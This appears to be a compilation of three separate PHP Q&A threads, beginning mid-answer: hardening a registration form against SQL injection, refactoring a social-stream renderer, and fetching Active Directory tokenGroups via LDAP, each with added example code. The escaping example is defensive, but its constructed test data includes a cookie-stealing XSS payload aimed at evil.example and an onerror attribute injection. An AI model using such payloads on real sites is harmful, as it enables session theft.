First, remember those two links are just starting points which point out what you can improve. Feel free to do more research, search the internet, etc.
Second, fix one thing at a time. So first concentrate on the SQL problems; when you've sorted that, go on to the password hashing; when you've sorted that, move on to SSL.
Your reply came about 15 minutes after my comment; you should expect to invest several days in this. This is not a simple problem you can fix with a single line of code; you will need to grasp deeper concepts if you want to do it correctly.
Keep at it! Don't lose hope! All programmers struggle! And if you have problems/can't figure something out, don't be afraid to ask more (specific) questions on StackOverflow. And remember, at the end of all of this, you will be a better programmer. These few days of investment will benefit you for life!
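The answer above deliberately lists the three fixes (SQL injection, password hashing, SSL) without writing them. As an added example that is neither the asker's code nor the answerer's, here is the same form with the first two applied in the order the answer suggests. It assumes config.php creates a PDO connection in `$pdo`, and that the members table has a `password_hash` column, no `repeatPassword` column, and a unique index on username and on email; the username and password-length rules are illustrative choices.

```php
<?php
// Added example, not the asker's code or the answerer's: the same
// registration form with the fixes the answer lists, in order.
// Assumptions: config.php creates a PDO connection in $pdo; the members
// table has a password_hash column (and no repeatPassword column) with a
// unique index on username and on email.
declare(strict_types=1);
require 'config.php';

// Real prepared statements (no client-side emulation) and exceptions instead
// of silent failure, so a broken query can never be mistaken for success.
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// 1. Validate before touching the database. Returns a list of problems;
//    an empty list means the input is acceptable.
function validate_registration(array $post): array
{
    $errors = [];
    foreach (['name', 'surname', 'email', 'academic_institute', 'username', 'password', 'repeatPassword'] as $field) {
        if (!isset($post[$field]) || !is_string($post[$field]) || trim($post[$field]) === '') {
            $errors[] = "$field is required";
        }
    }
    if ($errors !== []) {
        return $errors;
    }
    if (filter_var($post['email'], FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email address is not valid';
    }
    if (!preg_match('/^[A-Za-z0-9_]{3,32}$/', $post['username'])) {
        $errors[] = 'username must be 3 to 32 letters, digits or underscores';
    }
    if (strlen($post['password']) < 12) {
        $errors[] = 'password must be at least 12 characters';
    }
    if ($post['password'] !== $post['repeatPassword']) {
        $errors[] = 'passwords must match';
    }
    return $errors;
}

// 2. SQL injection: values travel as bound parameters, never inside the query text.
// 3. Password storage: only a salted, slow hash is stored, never the password
//    (and never the repeatPassword copy the original schema kept).
function register_member(PDO $pdo, array $post): void
{
    $stmt = $pdo->prepare(
        'INSERT INTO members (name, surname, email, academic_institute, username, password_hash)
         VALUES (:name, :surname, :email, :academic, :username, :hash)'
    );
    $stmt->execute([
        ':name'     => $post['name'],
        ':surname'  => $post['surname'],
        ':email'    => $post['email'],
        ':academic' => $post['academic_institute'],
        ':username' => $post['username'],
        ':hash'     => password_hash($post['password'], PASSWORD_DEFAULT),
    ]);
}

// The matching login check: password_verify() recomputes the hash with the
// salt and cost stored in the column and compares in constant time.
function verify_login(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM members WHERE username = :username');
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['password_hash']);
}

if (isset($_POST['submit'])) {
    $errors = validate_registration($_POST);
    if ($errors !== []) {
        foreach ($errors as $error) {
            // Escaping everything that is echoed is the habit that prevents XSS.
            echo htmlspecialchars($error, ENT_QUOTES, 'UTF-8') . "<br>\n";
        }
    } else {
        try {
            register_member($pdo, $_POST);
            echo 'You have been registered';
        } catch (PDOException $e) {
            if ((string) $e->getCode() === '23000') {   // unique index hit
                echo 'That username or email address is already registered';
            } else {
                throw $e;   // goes to the server log; never echo $e->getMessage() to users
            }
        }
    }
}
```

The third item on the answer's list, SSL, is a web server and certificate matter rather than PHP code, but it is what keeps the password private between the browser and this script; without it the hashing only protects the stored copy.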

PHP refactoring and better coding for PHP?

I have this process that is the heart of the app I'm creating, but for some reason I feel like it's the worst way to do it (instinct), and I wanted to see if there is something wrong with this process and whether I am approaching it in a bad way! P.S. the code works fine; it's just a refactoring problem.
The process is:
Users go to the homepage and see the latest activities by other site members (home.php):
// function to bring the latest activities from the database
$results=function getUserUpdates($_SESSION['user_id'];
while ($row = mysql_fetch_array($results))
{
    // another function to format the activities in a social stream
    echo formatUpdate($row['user_note'], $row['dt'], $row['picture'], $row['username'], $row['id'], $row['reply_id'], $row['reply_name'], $row['votes_up'], $row['votes_down']);
}
I have put the function code in pastie:
formatUpdate function http://pastie.org/1213958
getUserUpdates function http://pastie.org/1213962
EDIT: both functions are in different files that are included in home.php:
formatUpdate from functions.php
getUserUpdates from queries.php
First of all, it's good that you have separate functions for getting the data and for formatting the data. It's a good start toward refactoring your code. It makes it easier in the future: if you ever want to format your data differently, you can just expand your formatter.
Second, this is what coreyward meant by a lambda:
$results=function getUserUpdates($_SESSION['user_id'];
Remove the function keyword. You use function when you're defining a function. But here you're only calling one. (You defined it in queries.php.)
Third, I agree with webbiedave about the echo statements. A good way to avoid that: In the "heart" of your app, collect all the HTML into one place. Then, when you've collected everything you're going to display on the page, you can echo it all at once. This makes it a lot easier to keep track of what you're doing, and to remember the order of everything. It also makes it easier to add headers and footers, or do more formatting. Otherwise, if you have echo statements scattered around your code, it's a lot easier to let something slip that shouldn't be there.
Here's a very basic example of what I mean:
$html = '';
$results = getUserUpdates($_SESSION['user_id']);
while ($row = mysql_fetch_array($results)) {
    $fields = array(
        'user_note'  => $row['user_note'],
        'dt'         => $row['dt'],
        'picture'    => $row['picture'],
        'username'   => $row['username'],
        'id'         => $row['id'],
        'reply_id'   => $row['reply_id'],
        'reply_name' => $row['reply_name'],
        'votes_up'   => $row['votes_up'],
        'votes_down' => $row['votes_down'],
    );
    $html .= formatUpdate($fields);
}
// This way you can do whatever you want to $html here.
echo $html;
Also notice that I put all the fields from $row into an array and passed it to formatUpdate(). That has two advantages:
It's easier to read.
If you ever want to change the fields that formatUpdate deals with, you don't have to worry about searching through your code to change the arguments every time you call it.
Firstly, I think you mean:
$results = getUserUpdates($_SESSION['user_id']);
In your getUserUpdates() function there is a redundant branch:
if ($username == $_SESSION['u_name']) {
    // return something
}
if ($username != $_SESSION['u_name']) {
    // return something else
}
You don't need the second if statement, as any code run at that point will only run if $username != $_SESSION['u_name'].
In my opinion, it's usually better not to have different functions directly echoing HTML up the stack (such as echoVote()). It's preferable to have functions return data and have the original caller echo it. This allows the caller to perform additional data massaging if desired.
Other than that, your code is fetching data, looping through and acting on the results which is pretty much standard fare.
I think your instinct is being a little too harsh on yourself ;) There are improvements to be made, but it's certainly not the worst way to do anything.
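Both answers want formatUpdate() to return its markup rather than echo it. One thing neither spells out is that user_note, username, reply_name and picture are user-supplied and end up inside HTML, so a formatter that returns them raw lets one member's note run script in everyone else's browser. As an added example (not the question's pastie code and not from either answer) here is a formatter that returns escaped HTML and a caller that collects the page before echoing once. The markup is an assumption, since the original formatUpdate is not shown, and the rows are a constructed stand-in for mysql_fetch_array() results.

```php
<?php
// Added example, not the question's formatUpdate() or getUserUpdates(): a
// formatter that returns escaped HTML, and a caller that collects the page
// before echoing once. $rows is a constructed stand-in for the query result.
declare(strict_types=1);

function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Every value from the database is treated as text, never as markup. The
// ids and vote counts are cast to int so they cannot carry anything else.
function formatUpdate(array $f): string
{
    $reply = '';
    if ($f['reply_id'] !== null && $f['reply_id'] !== '') {
        $reply = sprintf(' in reply to <a href="note.php?id=%d">%s</a>',
            (int) $f['reply_id'], h((string) $f['reply_name']));
    }
    return sprintf(
        '<div class="update" id="note-%d">'
        . '<img src="%s" alt="">'
        . '<strong>%s</strong>%s <time>%s</time>'
        . '<p>%s</p>'
        . '<span class="votes">+%d / -%d</span>'
        . '</div>' . "\n",
        (int) $f['id'],
        h((string) $f['picture']),
        h((string) $f['username']),
        $reply,
        h((string) $f['dt']),
        h((string) $f['user_note']),
        (int) $f['votes_up'],
        (int) $f['votes_down']
    );
}

// The caller owns the output: nothing below formatUpdate() echoes.
function renderUpdates(iterable $rows): string
{
    $html = '';
    foreach ($rows as $row) {
        $html .= formatUpdate($row);
    }
    return $html;
}

// Constructed rows; the second one carries the kind of values that break a
// formatter which drops fields into the markup unescaped.
$rows = [
    ['user_note' => 'Hello world', 'dt' => '2010-10-08 12:00', 'picture' => 'a.png',
     'username' => 'alice', 'id' => 1, 'reply_id' => null, 'reply_name' => null,
     'votes_up' => 3, 'votes_down' => 0],
    ['user_note' => '<script>document.location="http://evil.example/?"+document.cookie</script>',
     'dt' => '2010-10-08 12:05', 'picture' => 'b.png" onerror="alert(1)',
     'username' => 'mallory', 'id' => 2, 'reply_id' => 1, 'reply_name' => 'alice',
     'votes_up' => 0, 'votes_down' => 5],
];

echo renderUpdates($rows);
```

Escaping at the point where a value enters HTML, rather than when it is stored, is what makes this hold up when the same note is later shown in a different template.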

Using LDAP functions to get Active Directory tokenGroups attribute in PHP

Greetings,
I already have a working connection to AD and can search and retrieve information from it. I've even developed a recursive method by which one can retrieve all groups for a given user. However, I'd like to avoid the recursion if possible. One way to do this is to get the tokenGroups attribute from AD for the user, which should be a list of the SIDs of the groups the specified user is a member of, whether that membership is direct or indirect.
When I run a search for a user's AD information, though, the tokenGroups attribute isn't even in it. I tried specifically requesting that information (i.e., specifying it using the fourth parameter to ldap_search), but that didn't work either.
Thanks,
David Kees
Solved my own problem and thought I'd put the answer here so that others might find it. The issue was using the ldap_search() function. The answer was to use ldap_read() instead of ldap_search(). The difference is the scope of the request: the search function uses a scope of "sub" (i.e., subtree) while the read function uses "base". The tokenGroups information can only be found when using a scope of "base", so using the correct PHP function was the key.
As I mentioned above, I was working from someone else's code in Perl to create my solution, and the Perl script used a function named "search" to do its LDAP requests, which led me down the wrong path.
Thanks to those who took a peek at the question!
--
As per the requests in the comments, here are the basics of the solution in code. I'm extracting from an object that I use, so this might not be 100%, but it'll be close. Also, variables not declared in this snippet (e.g. $server, $user, $password) are for you to figure out; I won't know your AD credentials anyway!
$ldap = ldap_connect($server);
ldap_bind($ldap, $user, $password);
$tokengroups = ldap_read($ldap, $dn, "CN=*", array("tokengroups"));
$tokengroups = ldap_get_entries($ldap, $tokengroups);
At this point, $tokengroups is our result as an array. It should have a count index as well as some other information. To extract the actual groups, you'll need to do something like this:
$groups = array();
if ($tokengroups["count"] > 0) {
    $groups = $tokengroups[0]["tokengroups"];
    unset($groups["count"]);
    // if you want the SIDs for your groups, you can stop here.
    // if you want to decode the SIDs then you can do something like this.
    // the sid_decode() here: http://www.php.net/manual/en/function.unpack.php#72591
    foreach ($groups as $i => &$sid) {
        $sid = sid_decode($sid);
        $sid_dn = ldap_read($ldap, "<SID=$sid>", "CN=*", array("dn"));
        if ($sid_dn !== false) {
            $group = ldap_get_entries($ldap, $sid_dn);
            $group = $group["count"] == 1 ? $group[0]["dn"] : NULL;
            $groups[$i] = $group;
        }
    }
}
That's the basics. There's one caveat: you'll probably need to work with the individual or individuals who manage AD accounts at your organization. The first time I tried to get this running (a few years ago, so my memory is somewhat fuzzy), the account that I was given did not have the appropriate authorization to access the tokenGroups information. I'm sure there are other ways to do this, but because I was porting someone else's code for this specific solution, this was how I did it.
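The answer leans on a sid_decode() from a php.net comment that is not reproduced here. As an added example, not the answer's code, here is a self-contained decoder for the binary SID values that tokenGroups returns, written from the documented SID layout, together with the lookup loop around it. The SID bytes at the bottom are constructed with pack() so the decoder can be run without a directory; `$ldap` in the lookup helper is an assumed, already-bound connection.

```php
<?php
// Added example, not from the answer: a self-contained sid_decode() for the
// binary tokenGroups values, plus the lookup loop around it. The SID bytes
// below are constructed with pack() so this runs without a directory.
declare(strict_types=1);

// Binary SID layout: revision (1 byte), sub-authority count (1 byte),
// identifier authority (6 bytes, big-endian), then count x 4-byte
// little-endian sub-authorities. Returns the usual "S-1-5-21-..." form.
function sid_decode(string $bin): string
{
    $len = strlen($bin);
    if ($len < 8) {
        throw new InvalidArgumentException('SID shorter than its 8-byte header');
    }
    $revision = ord($bin[0]);
    $count = ord($bin[1]);
    if ($revision !== 1 || $count > 15 || $len !== 8 + 4 * $count) {
        throw new InvalidArgumentException('malformed SID');
    }
    $authority = 0;
    for ($i = 2; $i < 8; $i++) {
        $authority = ($authority << 8) | ord($bin[$i]);
    }
    $sid = "S-$revision-$authority";
    for ($i = 0; $i < $count; $i++) {
        $sub = unpack('V', substr($bin, 8 + 4 * $i, 4))[1];   // unsigned 32-bit LE
        $sid .= '-' . sprintf('%u', $sub);
    }
    return $sid;
}

// Resolve each tokenGroups value to a group DN by reading the <SID=...>
// form, as the answer does. $ldap is an assumed, already-bound connection
// (a resource on PHP 7, an LDAP\Connection object on PHP 8).
function token_groups_to_dns($ldap, array $tokengroups): array
{
    $dns = [];
    foreach ($tokengroups as $binsid) {
        $sid = sid_decode($binsid);
        $res = @ldap_read($ldap, "<SID=$sid>", '(objectClass=*)', ['dn']);
        if ($res === false) {
            $dns[$sid] = null;   // e.g. a SID from another domain this DC cannot resolve
            continue;
        }
        $entries = ldap_get_entries($ldap, $res);
        $dns[$sid] = $entries['count'] === 1 ? $entries[0]['dn'] : null;
    }
    return $dns;
}

// Constructed example SID: revision 1, authority 5 (NT Authority), then
// sub-authorities 21, three made-up domain identifiers, and RID 512.
$sample = pack('CCnNV*', 1, 5, 0, 5, 21, 1004336348, 1177238915, 682003330, 512);
echo sid_decode($sample), "\n";
```

The constructed value decodes to S-1-5-21-1004336348-1177238915-682003330-512. Two caveats a practitioner would want next to the answer's snippet: ldap_bind() with a password over a plain ldap:// connection sends that password in the clear, so use an ldaps:// URL or call ldap_start_tls() before binding; and the length and count checks in sid_decode() matter because a truncated or oversized attribute value is otherwise silently misparsed into a wrong, and possibly more privileged, group identity.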
